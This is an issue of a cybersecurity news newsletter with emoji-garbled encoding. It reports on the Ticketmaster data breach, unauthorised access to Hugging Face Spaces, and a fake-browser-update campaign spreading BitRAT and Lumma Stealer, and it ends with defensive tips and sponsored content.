Jun 03 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter thatβs blasting off like #Starlink πππ
Todayβs hottest cybersecurity news stories:
π« Ticketmaster hacked again! 560m affected. $500k demanded π°
π€ Hugging Face detects unauthorised access to Spaces platform π
β οΈ Beware of fake browser update delivering BitRAT, Lumma Stealer π
Live Nation, Ticketmasterβs owner, confirmed "unauthorised activity" on its database after hackers claimed to have stolen personal details of 560 million customers. The hacking group ShinyHunters demands a $500,000 ransom to prevent selling the data. π°
What Was Stolen? π€
The stolen data includes:
Names
Addresses
Phone numbers
Partial credit card details π³
Investigation Underway
Live Nation revealed in a filing to the SEC that a criminal threat actor offered the data for sale on the dark web on May 27. The exact number of affected customers remains unconfirmed. π
Global Impact π
The Australian government and the FBI are involved in addressing the breach. Live Nation is working to mitigate risks and notify users about the unauthorised access. π
Linked Hacks π
This breach may be connected to a larger hacking campaign. Santander recently confirmed a related data breach affecting 30 million customers. Data samples have been posted on BreachForums, a dark web hacking forum. π»
ShinyHunters' HistoryΒ π
ShinyHunters has a notorious past, including a breach of 70 million AT&T customers in 2021 and 200,000 Pizza Hut customers in Australia last year. Despite the FBIβs crackdown in March 2023, the group remains active. π¨
Past Security Issues π
Ticketmaster has faced security issues before, including a $10 million fine in 2020 for hacking a competitor and a cyber attack in November affecting Taylor Swift's Era's tour ticket sales. ποΈ
Top Tips π‘οΈ
If youβre worried you may be affected:
Be alert for suspicious emails, messages, and calls.
Avoid sharing information with scammers exploiting the breach.
Β Watch out for messages about password resets, compensation, or missed deliveries.
Monitor your financial accounts for suspicious activity.
Change your Ticketmaster password and any other sites using the same password. π
Stay safe and vigilant as this situation unfolds!
Spending hours gathering evidence, tracking risk, and answering security questionnaires? Move away from manual work by automating key GRC program needs with Vanta.
Automate evidence collection across 21+ frameworks including SOC 2 and ISO 27001 with continuous monitoring
Centralize risk and report on program impact to internal teams
Create your own Trust Center to proactively manage buyer needs
Leverage AI to answer security questionnaires faster
Join Vantaβs webinar on June 11 to learn more about scaling your GRC program with automation and AI.
AI company Hugging Face revealed unauthorised access to its Spaces platform. Suspicions arise that a subset of Spaces' secrets may have been accessed without authorization. π
What is Spaces? π
Spaces allows users to create, host, and share AI and machine learning applications. It also serves as a discovery service for AI apps made by others on the platform. π§
Immediate Response π£οΈ
Hugging Face is revoking compromised HF tokens and notifying affected users via email. They recommend refreshing keys or tokens and switching to fine-grained access tokens, which are now the default. π
Impact and Investigation π₯
The number of impacted users remains undisclosed. The incident is under investigation, and law enforcement and data protection authorities have been alerted. π¨
AI Sector Under Attack π―
The rapid growth of AI has made AI-as-a-service providers like Hugging Face prime targets for attackers. In early April, cloud security firm Wiz highlighted potential vulnerabilities in Hugging Face, including cross-tenant access and AI/ML model poisoning risks. π
Previous Security Concerns β οΈ
Research by HiddenLayer identified flaws in Hugging Face's Safetensors conversion service, enabling hijacking of AI models for supply chain attacks. Malicious actors compromising Hugging Face could access private AI models, datasets, and critical applications, posing significant risks. β οΈ
Stay Secure π‘οΈ
Hugging Face users should update their tokens and stay vigilant against potential security threats. This breach underscores the importance of robust security measures in the growing AI sector. π
Cybersecurity firm eSentire has identified a new wave of cyberattacks using fake browser updates to distribute remote access trojans (RATs) and information-stealing malware such as BitRAT and Lumma Stealer (aka LummaC2). π
The Attack Chain π
Initial Contact: Victims are lured to a compromised website with JavaScript that redirects them to a fake browser update page ("chatgpt-app[.]cloud").
Download: The page prompts an automatic download of a ZIP archive file ("Update.zip") hosted on Discord.
Execution: Inside the ZIP file, a JavaScript file ("Update.js") executes PowerShell scripts to fetch additional payloads disguised as PNG images from a remote server.
PowerShell Payloads π
The PowerShell scripts not only ensure persistence but also deploy a .NET-based loader used to deliver final-stage malware, including BitRAT and Lumma Stealer.
BitRAT: A versatile RAT capable of data theft, cryptocurrency mining, and remote control.
Lumma Stealer: A commercial information stealer that extracts data from web browsers, crypto wallets, and more, available for $250 to $1,000 per month since August 2022.
Why This Tactic Works βοΈ
The fake browser update lure is effective because it leverages the trust associated with well-known software updates, maximising the reach and impact of the attack. This method has been commonly used to distribute various types of malware, including the notorious SocGholish malware. π΅οΈββοΈ
Broader Threat Landscape ποΈ
ClearFake Campaign: A new variant discovered by ReliaQuest involves tricking users into executing malicious PowerShell code by claiming a browser display issue and instructing them to install a root certificate.
Webhard Distribution: The AhnLab Security Intelligence Center (ASEC) reported campaigns using webhards to distribute malicious installers for adult games and cracked software, leading to malware like Orcus RAT and XMRig miner.
Impact and Prevalence π₯
Lumma Stealer has become one of the most prevalent info stealers, with a significant increase in logs for sale on cybercrime forums. The malwareβs effectiveness lies in its ability to infiltrate systems and exfiltrate data undetected.
Additional Findings π§
CryptoChameleon: Silent Push highlighted CryptoChameleonβs use of DNSPod[.]com nameservers for fast flux evasion techniques, allowing quick cycling of IPs linked to a single domain name, complicating traditional countermeasures.
Top Tips π‘οΈ
Be Wary of Fake Updates: Always verify the source of any software update prompt.
Monitor PowerShell Activity: Keep an eye on unexpected PowerShell executions.
Use Security Software: Employ robust antivirus and anti-malware tools.
Stay Informed: Keep up with cybersecurity news and updates to be aware of emerging threats.
By staying vigilant and informed, individuals and organisations can better protect themselves against these sophisticated and evolving cyber threats. π
ποΈ Extra, Extra! Read all about it! ποΈ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
π‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday π
π΅Β Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for π
πΒ Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πΎ
Let us know what you think.
So long and thanks for reading all the phish!